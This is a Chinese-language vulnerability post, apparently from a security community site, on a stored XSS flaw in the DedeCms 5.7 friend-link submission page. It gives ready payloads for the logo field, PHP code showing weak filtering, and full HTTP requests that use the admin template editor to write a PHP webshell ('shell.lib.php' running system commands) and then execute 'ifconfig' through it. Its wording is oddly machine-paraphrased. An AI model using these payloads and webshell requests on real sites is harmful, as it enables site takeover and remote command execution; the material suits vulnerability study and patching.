DedeCms 5.7友情链接模块注入漏洞

破绽描绘

DedeCms基于PHP+MySQL的技术开发,是目前国内应用最普遍的php类CMS系统。

DedeCms 5.7前台提交友谊链接处,能够插入歹意JS代码。
 


 

破绽版本

DedeCms 5.7
 


 

应用条件

需求管理员登录
 


 

破绽应用过程简介

1.访问plus/flink_add.php,添加友谊链接信息 其他字段随意填,在“网站Logo”处添加如下字段 www.test.com' onerror='alert(1) 或者 www.test.com'onerror=location.href='http://www.baidu.com 2.提交 3.管理员登录后台,查看友谊链接的时分就会触发
 


 

破绽原理剖析

plus/flink.php剖析

-------省略局部代码
$msg = htmlspecialchars($msg);
$email = htmlspecialchars($email);
$webname = htmlspecialchars($webname);
$url = htmlspecialchars($url);
$logo = htmlspecialchars($logo);
$typeid = intval($typeid);
$dtime = time();
$query = "INSERT INTO `#@__flink`(sortrank,url,webname,logo,msg,email,typeid,dtime,ischeck)
                VALUES('50','$url','$webname','$logo','$msg','$email','$typeid','$dtime','0')";
$dsql->ExecuteNoneQuery($query);
-------省略局部代码

只用htmlspecialchars对用户提交的数据停止了简单的处置 并没有过滤特殊字符,也没有判别数据的有效性

图片[1]-DedeCms 5.7友情链接模块注入漏洞-孤勇者社区
 


 

扩展内容

友谊衔接
图片[2]-DedeCms 5.7友情链接模块注入漏洞-孤勇者社区
 

GET /dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?php+@system($_REQUEST[%27c%27]);?%3E&filename=shell.lib.php HTTP/1.1
Host: 192.168.170.139
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3590.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.170.139/dede/friendlink_main.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: menuitems=1_1%2C2_1%2C3_1%2C4_1%2C5_1; PHPSESSID=007f34e0c5cb0af798fc22cd2cc59442; _csrf_name_219dde03=0957cc447dd927bbc951a41988de261c; _csrf_name_219dde03__ckMd5=b038b83ef0fe4362; last_vtime=1543393996; last_vtime__ckMd5=60dff44dc846f210; last_vid=0000001; last_vid__ckMd5=a4e5f256daf9e616; DedeUserID=1; DedeUserID__ckMd5=3f11bf2d96ba0bad; DedeLoginTime=1543395060; DedeLoginTime__ckMd5=5ee3e2d97596dade; ENV_GOBACK_URL=%2Fdede%2Ffriendlink_main.php
Connection: close

发现胜利生成两个webshell:

图片[3]-DedeCms 5.7友情链接模块注入漏洞-孤勇者社区

直接访问生成的webshell:

GET /include/taglib/shell.lib.php?c=ifconfig HTTP/1.1
Host: 192.168.170.139
Connection: close

图片[4]-DedeCms 5.7友情链接模块注入漏洞-孤勇者社区
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞5赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片